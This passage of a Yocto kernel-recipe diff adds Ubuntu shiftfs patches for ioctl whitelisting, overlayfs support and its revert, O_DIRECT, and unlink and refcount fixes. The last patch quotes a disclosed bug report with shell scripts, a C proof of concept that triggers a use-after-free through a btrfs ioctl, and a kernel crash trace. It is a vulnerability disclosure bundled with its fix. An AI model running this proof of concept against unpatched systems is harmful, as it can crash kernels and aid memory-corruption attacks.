+BTRFS_IOC_FS_INFO, BTRFS_IOC_SUBVOL_GETFLAGS, and
+BTRFS_IOC_SUBVOL_SETFLAGS. All of them should be safe for unprivileged
+users.
+
+Cc: Seth Forshee <seth.forshee@canonical.com>
+Cc: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Seth Forshee <seth.forshee@canonical.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
+---
+ fs/shiftfs.c | 21 ++++++++++++++++++---
+ 1 file changed, 18 insertions(+), 3 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index a1dae7ea593b..49f6714e9f95 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1507,9 +1507,14 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
+ 	return ret;
+ }
+ 
+-static bool in_ioctl_whitelist(int flag)
++static bool in_ioctl_whitelist(int flag, unsigned long arg)
+ {
++	void __user *argp = (void __user *)arg;
++	u64 flags = 0;
++
+ 	switch (flag) {
++	case BTRFS_IOC_FS_INFO:
++		return true;
+ 	case BTRFS_IOC_SNAP_CREATE:
+ 		return true;
+ 	case BTRFS_IOC_SNAP_CREATE_V2:
+@@ -1517,6 +1522,16 @@ static bool in_ioctl_whitelist(int flag)
+ 	case BTRFS_IOC_SUBVOL_CREATE:
+ 		return true;
+ 	case BTRFS_IOC_SUBVOL_CREATE_V2:
++		return true;
++	case BTRFS_IOC_SUBVOL_GETFLAGS:
++		return true;
++	case BTRFS_IOC_SUBVOL_SETFLAGS:
++		if (copy_from_user(&flags, arg, sizeof(flags)))
++			return false;
++
++		if (flags & ~BTRFS_SUBVOL_RDONLY)
++			return false;
++
+ 		return true;
+ 	case BTRFS_IOC_SNAP_DESTROY:
+ 		return true;
+@@ -1536,7 +1551,7 @@ static long shiftfs_ioctl(struct file *file, unsigned int cmd,
+ 	case FS_IOC_SETFLAGS:
+ 		break;
+ 	default:
+-		if (!in_ioctl_whitelist(cmd) ||
++		if (!in_ioctl_whitelist(cmd, arg) ||
+ 		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
+ 			return -ENOTTY;
+ 	}
+@@ -1555,7 +1570,7 @@ static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
+ 	case FS_IOC32_SETFLAGS:
+ 		break;
+ 	default:
+-		if (!in_ioctl_whitelist(cmd) ||
++		if (!in_ioctl_whitelist(cmd, arg) ||
+ 		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
+ 			return -ENOIOCTLCMD;
+ 	}
+-- 
+2.20.1
+

--- a/recipes-kernel/linux/linux-vanilla/4.19/0010-UBUNTU-SAUCE-shiftfs-enable-overlayfs-on-shiftfs.patch
+++ b/recipes-kernel/linux/linux-vanilla/4.19/0010-UBUNTU-SAUCE-shiftfs-enable-overlayfs-on-shiftfs.patch
@@ -1,0 +1,114 @@
+From 3fb4d7dc15bd8ce8dde2c6e64112e5aa01017616 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@canonical.com>
+Date: Thu, 1 Aug 2019 20:08:29 +0200
+Subject: [PATCH 10/23] UBUNTU: SAUCE: shiftfs: enable overlayfs on shiftfs
+
+BugLink: https://bugs.launchpad.net/bugs/1838677
+
+This patch enables overlayfs to use shiftfs as an underlay.
+
+Currently it is not possible to use overlayfs on top of shiftfs. This
+means Docker inside of LXD cannot make user of the overlay2 graph driver
+which is blocking users such as Travis from making use of it
+efficiently.
+
+Co-Developed-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Christian Brauner <christian.brauner@canonical.com>
+Acked-by: Kleber Souza <kleber.souza@canonical.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
+---
+ fs/open.c            | 4 +++-
+ fs/overlayfs/file.c  | 1 +
+ fs/overlayfs/super.c | 5 +++--
+ fs/shiftfs.c         | 4 +++-
+ include/linux/fs.h   | 3 ++-
+ 5 files changed, 12 insertions(+), 5 deletions(-)
+
+diff --git a/fs/open.c b/fs/open.c
+index 878478745924..92c2d11a8928 100644
+--- a/fs/open.c
++++ b/fs/open.c
+@@ -929,13 +929,15 @@ struct file *dentry_open(const struct path *path, int flags,
+ EXPORT_SYMBOL(dentry_open);
+ 
+ struct file *open_with_fake_path(const struct path *path, int flags,
+-				struct inode *inode, const struct cred *cred)
++				 struct inode *inode, struct dentry *dentry,
++				 const struct cred *cred)
+ {
+ 	struct file *f = alloc_empty_file_noaccount(flags, cred);
+ 	if (!IS_ERR(f)) {
+ 		int error;
+ 
+ 		f->f_path = *path;
++		f->f_path.dentry = dentry;
+ 		error = do_dentry_open(f, inode, NULL);
+ 		if (error) {
+ 			fput(f);
+diff --git a/fs/overlayfs/file.c b/fs/overlayfs/file.c
+index 0bd276e4ccbe..f4dc5c14cdd1 100644
+--- a/fs/overlayfs/file.c
++++ b/fs/overlayfs/file.c
+@@ -34,6 +34,7 @@ static struct file *ovl_open_realfile(const struct file *file,
+ 
+ 	old_cred = ovl_override_creds(inode->i_sb);
+ 	realfile = open_with_fake_path(&file->f_path, flags, realinode,
++				       ovl_dentry_real(file->f_path.dentry),
+ 				       current_cred());
+ 	revert_creds(old_cred);
+ 
+diff --git a/fs/overlayfs/super.c b/fs/overlayfs/super.c
+index 127df4a85c8a..36ab4d925d3f 100644
+--- a/fs/overlayfs/super.c
++++ b/fs/overlayfs/super.c
+@@ -754,13 +754,14 @@ static int ovl_mount_dir(const char *name, struct path *path)
+ 		ovl_unescape(tmp);
+ 		err = ovl_mount_dir_noesc(tmp, path);
+ 
+-		if (!err)
+-			if (ovl_dentry_remote(path->dentry)) {
++		if (!err) {
++			if ((path->dentry->d_sb->s_magic != SHIFTFS_MAGIC) && ovl_dentry_remote(path->dentry)) {
+ 				pr_err("overlayfs: filesystem on '%s' not supported as upperdir\n",
+ 				       tmp);
+ 				path_put_init(path);
+ 				err = -EINVAL;
+ 			}
++		}
+ 		kfree(tmp);
+ 	}
+ 	return err;
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 49f6714e9f95..400c3062365c 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1048,7 +1048,9 @@ static struct file *shiftfs_open_realfile(const struct file *file,
+ 	oldcred = shiftfs_override_creds(inode->i_sb);
+ 	/* XXX: open_with_fake_path() not gauranteed to stay around, if
+ 	 * removed use dentry_open() */
+-	lowerf = open_with_fake_path(realpath, file->f_flags, loweri, info->creator_cred);
++	lowerf = open_with_fake_path(realpath, file->f_flags, loweri,
++				     realpath->dentry,
++				     info->creator_cred);
+ 	revert_creds(oldcred);
+ 
+ 	return lowerf;
+diff --git a/include/linux/fs.h b/include/linux/fs.h
+index 92420009b9bc..9ed738faff9e 100644
+--- a/include/linux/fs.h
++++ b/include/linux/fs.h
+@@ -2458,7 +2458,8 @@ extern struct file *file_open_root(struct dentry *, struct vfsmount *,
+ 				   const char *, int, umode_t);
+ extern struct file * dentry_open(const struct path *, int, const struct cred *);
+ extern struct file * open_with_fake_path(const struct path *, int,
+-					 struct inode*, const struct cred *);
++					 struct inode*, struct dentry *dentry,
++					 const struct cred *);
+ static inline struct file *file_clone_open(struct file *file)
+ {
+ 	return dentry_open(&file->f_path, file->f_flags, file->f_cred);
+-- 
+2.20.1
+

--- a/recipes-kernel/linux/linux-vanilla/4.19/0011-UBUNTU-SAUCE-shiftfs-add-O_DIRECT-support.patch
+++ b/recipes-kernel/linux/linux-vanilla/4.19/0011-UBUNTU-SAUCE-shiftfs-add-O_DIRECT-support.patch
@@ -1,0 +1,47 @@
+From 7c29d5c0e5e0160c4d3a64a65a71a127537cc85c Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Fri, 19 Jul 2019 17:50:00 +0200
+Subject: [PATCH 11/23] UBUNTU: SAUCE: shiftfs: add O_DIRECT support
+
+BugLink: https://bugs.launchpad.net/bugs/1837223
+
+This enabled O_DIRECT support for shiftfs if the underlay supports it.
+
+Currently shiftfs does not handle O_DIRECT if the underlay supports it.
+This is blocking dqlite - an essential part of LXD - from profiting from
+the performance benefits of O_DIRECT on suitable filesystems when used
+with async io such as aio or io_uring.
+Overlayfs cannot support this directly since the upper filesystem in
+overlay can be any filesystem. So if the upper filesystem does not
+support O_DIRECT but the lower filesystem does you're out of luck.
+Shiftfs does not suffer from the same problem since there is not concept
+of an upper filesystem in the same way that overlayfs has it.
+Essentially, shiftfs is a transparent shim relaying everything to the
+underlay while overlayfs' upper layer is not (completely).
+
+Cc: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Seth Forshee <seth.forshee@canonical.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
+---
+ fs/shiftfs.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 400c3062365c..5a889d4d880c 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1128,6 +1128,9 @@ static int shiftfs_open(struct inode *inode, struct file *file)
+ 	}
+ 
+ 	file->private_data = file_info;
++	/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO. */
++	file->f_mapping = realfile->f_mapping;
++
+ 	file_info->realfile = realfile;
+ 	return 0;
+ }
+-- 
+2.20.1
+

--- a/recipes-kernel/linux/linux-vanilla/4.19/0012-UBUNTU-SAUCE-shiftfs-pass-correct-point-down.patch
+++ b/recipes-kernel/linux/linux-vanilla/4.19/0012-UBUNTU-SAUCE-shiftfs-pass-correct-point-down.patch
@@ -1,0 +1,36 @@
+From 2c604f81698abf5ee90f059ddb7711ad5bde8ee9 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Fri, 19 Jul 2019 17:50:00 +0200
+Subject: [PATCH 12/23] UBUNTU: SAUCE: shiftfs: pass correct point down
+
+BugLink: https://bugs.launchpad.net/bugs/1837231
+
+This used to pass an unsigned long to copy_from_user() instead of a
+void __user * pointer. This will produce warning with a sufficiently
+advanced compiler.
+
+Cc: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Seth Forshee <seth.forshee@canonical.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
+---
+ fs/shiftfs.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 5a889d4d880c..450e93b8b5b8 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1531,7 +1531,7 @@ static bool in_ioctl_whitelist(int flag, unsigned long arg)
+ 	case BTRFS_IOC_SUBVOL_GETFLAGS:
+ 		return true;
+ 	case BTRFS_IOC_SUBVOL_SETFLAGS:
+-		if (copy_from_user(&flags, arg, sizeof(flags)))
++		if (copy_from_user(&flags, argp, sizeof(flags)))
+ 			return false;
+ 
+ 		if (flags & ~BTRFS_SUBVOL_RDONLY)
+-- 
+2.20.1
+

--- a/recipes-kernel/linux/linux-vanilla/4.19/0013-UBUNTU-SAUCE-Revert-UBUNTU-SAUCE-shiftfs-enable-over.patch
+++ b/recipes-kernel/linux/linux-vanilla/4.19/0013-UBUNTU-SAUCE-Revert-UBUNTU-SAUCE-shiftfs-enable-over.patch
@@ -1,0 +1,110 @@
+From ffe30efdb962bcb2c13c0aad6dc84044ff70748c Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Tue, 24 Sep 2019 15:55:51 -0500
+Subject: [PATCH 13/23] UBUNTU: SAUCE: Revert "UBUNTU: SAUCE: shiftfs: enable
+ overlayfs on shiftfs"
+
+BugLink: https://bugs.launchpad.net/bugs/1842382
+
+This commit is causing the paths in /proc/self/maps to all show
+up as / when proc is mounted over overlayfs in a chroot. Revert
+the commit to fix the regression until a proper fix is found.
+
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Acked-by: Sultan Alsawaf <sultan.alsawaf@canonical.com>
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
+---
+ fs/open.c            | 4 +---
+ fs/overlayfs/file.c  | 1 -
+ fs/overlayfs/super.c | 5 ++---
+ fs/shiftfs.c         | 4 +---
+ include/linux/fs.h   | 3 +--
+ 5 files changed, 5 insertions(+), 12 deletions(-)
+
+diff --git a/fs/open.c b/fs/open.c
+index 92c2d11a8928..878478745924 100644
+--- a/fs/open.c
++++ b/fs/open.c
+@@ -929,15 +929,13 @@ struct file *dentry_open(const struct path *path, int flags,
+ EXPORT_SYMBOL(dentry_open);
+ 
+ struct file *open_with_fake_path(const struct path *path, int flags,
+-				 struct inode *inode, struct dentry *dentry,
+-				 const struct cred *cred)
++				struct inode *inode, const struct cred *cred)
+ {
+ 	struct file *f = alloc_empty_file_noaccount(flags, cred);
+ 	if (!IS_ERR(f)) {
+ 		int error;
+ 
+ 		f->f_path = *path;
+-		f->f_path.dentry = dentry;
+ 		error = do_dentry_open(f, inode, NULL);
+ 		if (error) {
+ 			fput(f);
+diff --git a/fs/overlayfs/file.c b/fs/overlayfs/file.c
+index f4dc5c14cdd1..0bd276e4ccbe 100644
+--- a/fs/overlayfs/file.c
++++ b/fs/overlayfs/file.c
+@@ -34,7 +34,6 @@ static struct file *ovl_open_realfile(const struct file *file,
+ 
+ 	old_cred = ovl_override_creds(inode->i_sb);
+ 	realfile = open_with_fake_path(&file->f_path, flags, realinode,
+-				       ovl_dentry_real(file->f_path.dentry),
+ 				       current_cred());
+ 	revert_creds(old_cred);
+ 
+diff --git a/fs/overlayfs/super.c b/fs/overlayfs/super.c
+index 36ab4d925d3f..127df4a85c8a 100644
+--- a/fs/overlayfs/super.c
++++ b/fs/overlayfs/super.c
+@@ -754,14 +754,13 @@ static int ovl_mount_dir(const char *name, struct path *path)
+ 		ovl_unescape(tmp);
+ 		err = ovl_mount_dir_noesc(tmp, path);
+ 
+-		if (!err) {
+-			if ((path->dentry->d_sb->s_magic != SHIFTFS_MAGIC) && ovl_dentry_remote(path->dentry)) {
++		if (!err)
++			if (ovl_dentry_remote(path->dentry)) {
+ 				pr_err("overlayfs: filesystem on '%s' not supported as upperdir\n",
+ 				       tmp);
+ 				path_put_init(path);
+ 				err = -EINVAL;
+ 			}
+-		}
+ 		kfree(tmp);
+ 	}
+ 	return err;
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 450e93b8b5b8..9006201c243d 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1048,9 +1048,7 @@ static struct file *shiftfs_open_realfile(const struct file *file,
+ 	oldcred = shiftfs_override_creds(inode->i_sb);
+ 	/* XXX: open_with_fake_path() not gauranteed to stay around, if
+ 	 * removed use dentry_open() */
+-	lowerf = open_with_fake_path(realpath, file->f_flags, loweri,
+-				     realpath->dentry,
+-				     info->creator_cred);
++	lowerf = open_with_fake_path(realpath, file->f_flags, loweri, info->creator_cred);
+ 	revert_creds(oldcred);
+ 
+ 	return lowerf;
+diff --git a/include/linux/fs.h b/include/linux/fs.h
+index 9ed738faff9e..92420009b9bc 100644
+--- a/include/linux/fs.h
++++ b/include/linux/fs.h
+@@ -2458,8 +2458,7 @@ extern struct file *file_open_root(struct dentry *, struct vfsmount *,
+ 				   const char *, int, umode_t);
+ extern struct file * dentry_open(const struct path *, int, const struct cred *);
+ extern struct file * open_with_fake_path(const struct path *, int,
+-					 struct inode*, struct dentry *dentry,
+-					 const struct cred *);
++					 struct inode*, const struct cred *);
+ static inline struct file *file_clone_open(struct file *file)
+ {
+ 	return dentry_open(&file->f_path, file->f_flags, file->f_cred);
+-- 
+2.20.1
+

--- a/recipes-kernel/linux/linux-vanilla/4.19/0014-UBUNTU-SAUCE-shiftfs-mark-slab-objects-SLAB_RECLAIM_.patch
+++ b/recipes-kernel/linux/linux-vanilla/4.19/0014-UBUNTU-SAUCE-shiftfs-mark-slab-objects-SLAB_RECLAIM_.patch
@@ -1,0 +1,36 @@
+From d3abe5c8d6a3711719c15efcecd2f77e7cc5142b Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Fri, 30 Aug 2019 14:14:00 +0200
+Subject: [PATCH 14/23] UBUNTU: SAUCE: shiftfs: mark slab objects
+ SLAB_RECLAIM_ACCOUNT
+
+BugLink: https://bugs.launchpad.net/bugs/1842059
+
+Shiftfs does not mark it's slab cache as reclaimable. While this is not
+a big deal it is not nice to the kernel in general. The shiftfs cache is
+not so important that it can't be reclaimed.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Seth Forshee <seth.forshee@canonical.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
+---
+ fs/shiftfs.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 9006201c243d..5aaef6e703ce 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -2103,7 +2103,7 @@ static int __init shiftfs_init(void)
+ {
+ 	shiftfs_file_info_cache = kmem_cache_create(
+ 		"shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0,
+-		SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
++		SLAB_RECLAIM_ACCOUNT | SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
+ 	if (!shiftfs_file_info_cache)
+ 		return -ENOMEM;
+ 
+-- 
+2.20.1
+

--- a/recipes-kernel/linux/linux-vanilla/4.19/0015-UBUNTU-SAUCE-shiftfs-fix-buggy-unlink-logic.patch
+++ b/recipes-kernel/linux/linux-vanilla/4.19/0015-UBUNTU-SAUCE-shiftfs-fix-buggy-unlink-logic.patch
@@ -1,0 +1,66 @@
+From f1c83a12521b0a334057ebf79cc504113c9f9114 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Thu, 29 Aug 2019 20:45:00 +0200
+Subject: [PATCH 15/23] UBUNTU: SAUCE: shiftfs: fix buggy unlink logic
+
+BugLink: https://bugs.launchpad.net/bugs/1841977
+
+The way we messed with setting i_nlink was brittle and wrong. We used to
+set the i_nlink of the shiftfs dentry to be deleted to the i_nlink count
+of the underlay dentry of the directory it resided in which makes no
+sense whatsoever. We also missed drop_nlink() which is crucial since
+i_nlink affects whether a dentry is cleaned up on dput().
+With this I cannot reproduce the bug anymore where shiftfs misleads zfs
+into believing that a deleted file can not be removed from disk because
+it is still referenced.
+
+Fixes: commit 87011da41961 ("shiftfs: rework and extend")
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Seth Forshee <seth.forshee@canonical.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Acked-by: Connor Kuehl <connor.kuehl@canonical.com>
+Signed-off-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
+---
+ fs/shiftfs.c | 15 ++++++++++-----
+ 1 file changed, 10 insertions(+), 5 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 5aaef6e703ce..a21cb473e000 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -585,6 +585,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+ {
+ 	struct dentry *lowerd = dentry->d_fsdata;
+ 	struct inode *loweri = dir->i_private;
++	struct inode *inode = d_inode(dentry);
+ 	int err;
+ 	const struct cred *oldcred;
+ 
+@@ -594,15 +595,19 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+ 		err = vfs_rmdir(loweri, lowerd);
+ 	else
+ 		err = vfs_unlink(loweri, lowerd, NULL);
+-	inode_unlock(loweri);
+ 	revert_creds(oldcred);
+ 
+-	shiftfs_copyattr(loweri, dir);
+-	set_nlink(d_inode(dentry), loweri->i_nlink);
+-	if (!err)
++	if (!err) {
+ 		d_drop(dentry);
+ 
+-	set_nlink(dir, loweri->i_nlink);
++		if (rmdir)
++			clear_nlink(inode);
++		else
++			drop_nlink(inode);
++	}
++	inode_unlock(loweri);
++
++	shiftfs_copyattr(loweri, dir);
+ 
+ 	return err;
+ }
+-- 
+2.20.1
+

--- a/recipes-kernel/linux/linux-vanilla/4.19/0016-UBUNTU-SAUCE-shiftfs-Fix-refcount-underflow-in-btrfs.patch
+++ b/recipes-kernel/linux/linux-vanilla/4.19/0016-UBUNTU-SAUCE-shiftfs-Fix-refcount-underflow-in-btrfs.patch
@@ -1,0 +1,301 @@
+From e7d9f1d04409bfaaa70fca4602b043631dc9b508 Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Fri, 1 Nov 2019 10:41:03 -0500
+Subject: [PATCH 16/23] UBUNTU: SAUCE: shiftfs: Fix refcount underflow in btrfs
+ ioctl handling
+
+BugLink: https://bugs.launchpad.net/bugs/1850867
+
+shiftfs_btrfs_ioctl_fd_replace() installs an fd referencing a
+file from the lower filesystem without taking an additional
+reference to that file. After the btrfs ioctl completes this fd
+is closed, which then puts a reference to that file, leading to a
+refcount underflow. Original bug report and test case from Jann
+Horn is below.
+
+Fix this, and at the sametime simplify the management of the fd
+to the lower file for the ioctl. In
+shiftfs_btrfs_ioctl_fd_replace(), take the missing reference to
+the lower file and set FDPUT_FPUT so that this reference will get
+dropped on fdput() in error paths. Do not maintain the struct fd
+in the caller, as it the fd installed in the fd table is
+sufficient to properly clean up. Finally, remove the fdput() in
+shiftfs_btrfs_ioctl_fd_restore() as it is redundant with the
+__close_fd() call.
+
+Original report from Jann Horn:
+
+In shiftfs_btrfs_ioctl_fd_replace() ("//" comments added by me):
+
+ src = fdget(oldfd);
+ if (!src.file)
+  return -EINVAL;
+ // src holds one reference (assuming multithreaded execution)
+
+ ret = shiftfs_real_fdget(src.file, lfd);
+ // lfd->file is a file* now, but shiftfs_real_fdget didn't take any
+ // extra references
+ fdput(src);
+ // this drops the only reference we were holding on src, and src was
+ // the only thing holding a reference to lfd->file. lfd->file may be
+ // dangling at this point.
+ if (ret)
+  return ret;
+
+ *newfd = get_unused_fd_flags(lfd->file->f_flags);
+ if (*newfd < 0) {
+  // always a no-op
+  fdput(*lfd);
+  return *newfd;
+ }
+
+ fd_install(*newfd, lfd->file);
+ // fd_install() consumes a counted reference, but we don't hold any
+ // counted references. so at this point, if lfd->file hasn't been freed
+ // yet, its refcount is one lower than it ought to be.
+
+ [...]
+
+ // the following code is refcount-neutral, so the refcount stays one too
+ // low.
+ if (ret)
+  shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
+
+shiftfs_real_fdget() is implemented as follows:
+
+static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
+{
+ struct shiftfs_file_info *file_info = file->private_data;
+ struct file *realfile = file_info->realfile;
+
+ lowerfd->flags = 0;
+ lowerfd->file = realfile;
+
+ /* Did the flags change since open? */
+ if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
+  return shiftfs_change_flags(lowerfd->file, file->f_flags);
+
+ return 0;
+}
+
+Therefore, the following PoC will cause reference count overdecrements; I ran it
+with SLUB debugging enabled and got the following splat:
+
+=======================================
+user@ubuntu1910vm:~/shiftfs$ cat run.sh
+sync
+unshare -mUr ./run2.sh
+t run2user@ubuntu1910vm:~/shiftfs$ cat run2.sh
+set -e
+
+mkdir -p mnt/tmpfs
+mkdir -p mnt/shiftfs
+mount -t tmpfs none mnt/tmpfs
+mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
+mount|grep shift
+touch mnt/tmpfs/foo
+gcc -o ioctl ioctl.c -Wall
+./ioctl
+user@ubuntu1910vm:~/shiftfs$ cat ioctl.c
+
+int main(void) {
+  int root = open("mnt/shiftfs", O_RDONLY);
+  if (root == -1) err(1, "open shiftfs root");
+  int foofd = openat(root, "foo", O_RDONLY);
+  if (foofd == -1) err(1, "open foofd");
+  struct btrfs_ioctl_vol_args iocarg = {
+    .fd = foofd
+  };
+  ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
+  sleep(1);
+  void *map = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
+  if (map != MAP_FAILED) munmap(map, 0x1000);
+}
+user@ubuntu1910vm:~/shiftfs$ ./run.sh
+none on /home/user/shiftfs/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
+/home/user/shiftfs/mnt/tmpfs on /home/user/shiftfs/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
+[ 183.463452] general protection fault: 0000 [#1] SMP PTI
+[ 183.467068] CPU: 1 PID: 2473 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
+[ 183.472170] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
+[ 183.476830] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
+[ 183.478524] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
+[ 183.484585] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
+[ 183.486290] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
+[ 183.489617] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
+[ 183.491975] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
+[ 183.494311] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
+[ 183.496675] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
+[ 183.499011] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
+[ 183.501679] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+[ 183.503568] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
+[ 183.505901] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+[ 183.508229] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+[ 183.510580] Call Trace:
+[ 183.511396] mmap_region+0x417/0x670
+[ 183.512592] do_mmap+0x3a8/0x580
+[ 183.513655] vm_mmap_pgoff+0xcb/0x120
+[ 183.514863] ksys_mmap_pgoff+0x1ca/0x2a0
+[ 183.516155] __x64_sys_mmap+0x33/0x40
+[ 183.517352] do_syscall_64+0x5a/0x130
+[ 183.518548] entry_SYSCALL_64_after_hwframe+0x44/0xa9
+[ 183.520196] RIP: 0033:0x7f1d01bfaaf6
+[ 183.521372] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
+[ 183.527210] RSP: 002b:00007ffdf50bae98 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
+[ 183.529582] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f1d01bfaaf6
+[ 183.531811] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
+[ 183.533999] RBP: 0000000000000000 R08: 0000000000000004 R09: 0000000000000000
+[ 183.536199] R10: 0000000000000001 R11: 0000000000000246 R12: 00005616cf6f5140
+[ 183.538448] R13: 00007ffdf50bbfb0 R14: 0000000000000000 R15: 0000000000000000
+[ 183.540714] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm irqbypass snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core crct10dif_pclmul snd_hwdep crc32_pclmul ghash_clmulni_intel snd_pcm aesni_intel snd_seq_midi snd_seq_midi_event aes_x86_64 crypto_simd snd_rawmidi cryptd joydev input_leds snd_seq glue_helper qxl snd_seq_device snd_timer ttm drm_kms_helper drm snd fb_sys_fops syscopyarea sysfillrect sysimgblt serio_raw qemu_fw_cfg soundcore mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover psmouse ahci i2c_i801 libahci lpc_ich virtio_blk failover
+[ 183.560350] ---[ end trace 4a860910803657c2 ]---
+[ 183.561832] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
+[ 183.563496] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
+[ 183.569438] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
